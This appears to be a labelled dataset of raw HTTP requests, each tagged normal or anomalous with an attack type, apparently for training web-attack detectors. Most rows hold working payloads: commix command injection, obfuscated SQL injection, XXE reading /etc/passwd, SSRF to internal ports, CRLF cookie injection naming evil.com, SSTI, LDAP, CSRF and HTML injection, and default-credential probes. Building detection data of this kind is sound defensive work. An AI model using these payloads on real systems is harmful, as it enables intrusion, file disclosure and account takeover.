raw-request stringlengths 20 82.8k | label stringclasses 2
values | attack_type stringclasses 17
values |
|---|---|---|
GET /rest/products/search?q=%20%0aYUI=%24%28echo%20JGJRTX%29%0aYUI1=%24%7B%23YUI%7D%0aif%20%5B%201%20-eq%20%24YUI1%20%5D%0athen%20sleep%201%0afi%27 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: commix/v4.2.dev1 (https://commixproject.com)
Referer: http://localhost:3000/rest/products/search
Host: ... | anomalous | Command_Injection |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: de0c9f71-aeff-48b1-9918-38b865128824 | normal | none |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.8 (like Gecko)
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
... | anomalous | Cross_Site_Scripting |
GET /manager/html HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Authorization: Basic UUNDOmoyZGVwbG95ZXI=
Accept-Encoding: gzip
Connection: close | anomalous | Advanced_Vulnerability_Scan |
GET /rest/products/search?q=%2D%32%33%37%36%27%29%29%29%2F%2A%21%4F%72%2A%2F%34%33%37%33%3D%63%41%73%54%28%28%63%68%52%28%31%31%33%29%7C%7C%63%68%52%28%31%31%32%29%7C%7C%63%68%52%28%39%38%29%7C%7C%63%68%52%28%31%30%37%29%7C%7C%63%68%52%28%31%31%33%29%29%7C%7C%28%2F%2A%21%53%65%4C%45%43%54%2A%2F%28%2F%2A%21%43%61%53%45%... | anomalous | SQL_Injection |
GET /vulnerabilities/sqli/?id=cookie-httponly HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/... | anomalous | Web_Cache_Deception |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Edge/120.0.0.0
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x... | anomalous | Server_Side_Template_Injection |
GET /?ref=a79af3d1-2143-4415-9d79-3c23e9e84cba&session_token=4823 HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: a79af3d1-2143-44... | normal | none |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/... | anomalous | Cross_Site_Request_Forgery |
GET /vulnerabilities/sqli/?id={$smarty.version}}}// HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.8 (like Gecko)
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x... | anomalous | Server_Side_Template_Injection |
GET /vulnerabilities/sqli/?id=1 HTTP/1.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,im... | anomalous | CRLF_Injection |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: a693633f-4d36-4e47-a87f-012657742ecd | normal | none |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/... | anomalous | XML_External_Entity |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Acce... | anomalous | Directory_Traversal |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-g... | anomalous | Web_Cache_Deception |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Acce... | anomalous | Local_File_Inclusion |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-g... | anomalous | LDAP_Injection |
GET /error/error.log HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
Connection: close | anomalous | Advanced_Vulnerability_Scan |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: 8fb2abd3-055c-4067-9b65-6ad4a8d0f7aa | normal | none |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: f9f13f59-f2d0-42a7-95da-c637b4d86bf3 | normal | none |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: dac034ee-5937-4b02-8541-d33dd447c880 | normal | none |
GET /vulnerabilities/sqli/?id=<p>Website Defaced! HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.... | anomalous | HTML_Injection |
GET /vulnerabilities/sqli/?id=1 HTTP/1.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,im... | anomalous | CRLF_Injection |
GET /vulnerabilities/sqli/?id=dict://?0177.0.0.1:27017 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0... | anomalous | Server_Side_Request_Forgery |
GET /vulnerabilities/sqli/?id=1 HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzi... | anomalous | CRLF_Injection |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: 4990b49c-9e06-4525-aa4c-6a6797e1d8ee | normal | none |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: a662d5d1-7aa1-4217-b40f-b16ee1cf1e1e | normal | none |
GET /vulnerabilities/sqli/?id=1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Edge/120.0.0.0
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzi... | anomalous | CRLF_Injection |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (iPad; CPU OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q... | anomalous | Local_File_Inclusion |
GET /vulnerabilities/sqli/?id=1 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
... | anomalous | LDAP_Injection |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Acce... | anomalous | Directory_Traversal |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/... | anomalous | HTML_Injection |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Enc... | anomalous | Server_Side_Template_Injection |
GET /login HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Version/16.2 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip | anomalous | Advanced_Vulnerability_Scan |
GET /rest/products/search?q=%3Ch1%20style%3D%22color%3Ared%3Bfont-size%3A30px%3Bfont-weight%3Abold%3B%22%3EInjected%3C/h1%3E HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xm... | anomalous | HTML_Injection |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: c10e6eba-8ad1-46f6-b471-59703d212c0a | normal | none |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip,... | anomalous | HTML_Injection |
GET /vulnerabilities/sqli/?id=<?xml version="1.0"?><!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root> HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Edge/120.0.0.0
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,... | anomalous | XML_External_Entity |
GET /rest/products/search?q=fruit&cache_id=1f0e1584-523f-485d-a04f-0c20e7278806 HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: 1f... | normal | none |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Acce... | anomalous | Server_Side_Request_Forgery |
GET /rest/products/search?q=shirt&cache_id=253fb785-bf38-42e7-a8e1-821174cda2d5 HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: 25... | normal | none |
POST /FormLogin HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0
Connection: close
Content-Length: 70
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Login=Administrator&Redirection=/Templates/Loginpage.html&Password=100 | anomalous | Advanced_Vulnerability_Scan |
GET /vulnerabilities/sqli/?id=1 HTTP/1.1
User-Agent: <form action="/change-role%09" method="DELETE"><input type="hidden" name="csrf_token" value="admin%40evil.com"><input type="hidden" name="confirm_password" value="hacked"><input type="hidden" name="admin" value="delete`"><input type="hidden" name="password" value="ha... | anomalous | Cross_Site_Request_Forgery |
GET /rest/products/search?q=/%2f%23%0a%250d%250aSet-Cookie:crlf=injection; domain=evil.com HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,... | anomalous | CRLF_Injection |
GET /rest/products/search?q=%2D%32%39%33%38%22%29%29%2F%2A%21%6F%52%2A%2F%28%2F%2A%21%53%65%4C%65%63%74%2A%2F%28%2F%2A%21%63%61%53%65%2A%2F%2F%2A%21%77%48%65%6E%2A%2F%28%35%32%37%38%3D%35%32%37%38%29%2F%2A%21%74%68%45%6E%2A%2F%2F%2A%21%4E%75%6C%4C%2A%2F%2F%2A%21%45%6C%73%65%2A%2F%63%41%73%54%28%28%43%68%52%28%31%31%33%... | anomalous | SQL_Injection |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip,... | anomalous | Server_Side_Request_Forgery |
GET /vulnerabilities/sqli/?id=1 HTTP/1.1
User-Agent: <form action="/delete-account%20" method="PUT"><input type="hidden" name="new_password" value="eviluser"><input type="hidden" name="password" value="1
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text... | anomalous | Cross_Site_Request_Forgery |
GET /rest/products/search?q=%74%65%73%74%60%2F%2A%21%77%48%45%52%45%2A%2F%38%30%38%37%3D%38%30%38%37%2F%2A%21%41%6E%64%2A%2F%35%32%34%37%2F%2A%21%62%65%54%57%45%45%6E%2A%2F%35%32%34%37%2F%2A%21%41%6E%64%2A%2F%35%32%34%37%2D%2D%2F%2A%2A%2F%4F%65%58%70 HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT ... | anomalous | SQL_Injection |
GET /rest/products/search?q=%20%7C%5B%204%20-ne%20%24%28echo%20EEWDBT%20%7Ctr%20-d%20%27%5Cn%27%7Cwc%20-c%29%20%5D%7C%7Csleep%201%7C%7C HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: commix/v4.2.dev1 (https://commixproject.com)
Referer: http://localhost:3000/rest/products/search
Host: localhost:30... | anomalous | Command_Injection |
GET /?ref=87f75c21-e841-4be9-a56e-c0de3d2f6533&session_token=6095 HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: 87f75c21-e841-4b... | normal | none |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: 9061ec21-6ae9-47de-ab50-d6a31ee6a4c7 | normal | none |
GET /vulnerabilities/sqli/?id=<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ENTITY p2 SYSTEM "php://filter/convert.base64-encode/resource=/etc/mysql/my.cnf"> ]><svg>&p2;</svg> HTTP/1.1
User-Agent: Mozilla/5.0 (iPad; CPU OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15... | anomalous | XML_External_Entity |
GET /rest/products/search?q=%74%65%73%74%27%7C%7C%28%2F%2A%21%73%65%6C%45%63%54%2A%2F%51%42%6B%70%2F%2A%21%46%72%4F%6D%2A%2F%2F%2A%21%64%55%61%6C%2A%2F%2F%2A%21%77%68%45%72%65%2A%2F%39%31%39%39%3D%39%31%39%39%2F%2A%21%61%4E%64%2A%2F%35%35%37%39%2F%2A%21%62%65%54%57%45%45%4E%2A%2F%28%2F%2A%21%73%65%6C%45%63%54%2A%2F%2F%... | anomalous | SQL_Injection |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: 0b46c918-010b-41cc-b4e0-aebd86b237cc | normal | none |
POST /p/u/doAuthentication.do HTTP/1.0
Host: localhost:3000
bleed_attack: 2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 5
login | anomalous | Advanced_Vulnerability_Scan |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip,... | anomalous | Server_Side_Request_Forgery |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: fd035ad2-c175-4013-985c-9d8caa8f95bb | normal | none |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/... | anomalous | Directory_Traversal |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: 606d2a5b-ab61-498a-8c16-94a7f1a5f2cb | normal | none |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: 4c203f58-8b4a-4c88-9bc9-f9ab5abf34c7 | normal | none |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: 34c6bf77-6d1a-4eec-9743-4c7f65cf0110 | normal | none |
GET /rest/products/search?q=%20%3BYUI=%24%28echo%20MXXYQY%29%3BYUI1=%24%7B%23YUI%7D%3Bif%20%5B%203%20-eq%20%24YUI1%20%5D%3Bthen%20sleep%201%3Bfi%7C%7C HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: commix/v4.2.dev1 (https://commixproject.com)
Referer: http://localhost:3000/rest/products/search
Hos... | anomalous | Command_Injection |
GET /rest/products/search?q=";return(true);var xyz='a') HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.8 (like Gecko)
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzi... | anomalous | NoSQL_Injection |
GET /vulnerabilities/sqli/?id=?page=+%0a%0dSet-Cookie:crlf=injection; Path=/ HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/htm... | anomalous | CRLF_Injection |
GET /?ref=7199ceff-6d1e-4715-97cc-2587b7c7876f&session_token=6423 HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: 7199ceff-6d1e-47... | normal | none |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: d952469f-df3b-4c66-84b6-1158091aee44 | normal | none |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.8 (like Gecko)
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
... | anomalous | Directory_Traversal |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
Connection: close | anomalous | Advanced_Vulnerability_Scan |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip,... | anomalous | Directory_Traversal |
GET /vulnerabilities/sqli/?id=1 HTTP/1.1
User-Agent: ${{{ ''.__class__.__mro__[1].__subclasses__() }}}}}%0d%0a
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Cha... | anomalous | Server_Side_Template_Injection |
GET /rest/products/search?q=sale&cache_id=ca60fa01-5cd7-4548-af80-3f4ab24ebcab HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: ca6... | normal | none |
GET /vulnerabilities/sqli/?id=1 HTTP/1.1
User-Agent: Mozilla/5.0 (iPad; CPU OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*... | anomalous | Server_Side_Request_Forgery |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: 45af75ba-eb9f-4ca4-973a-6946c1e9147f | normal | none |
GET /vulnerabilities/sqli/?id=<b style="position:fixed;top:50%;left:50%;transform:translate(-50%,-50%);font-size:70px;color: HTTP/1.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1
Pragma: no-cache
Cache-Control: no-cac... | anomalous | HTML_Injection |
GET /vulnerabilities/sqli/?id=1 HTTP/1.1
User-Agent: )(mail=*))(objectClass=*)
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.... | anomalous | LDAP_Injection |
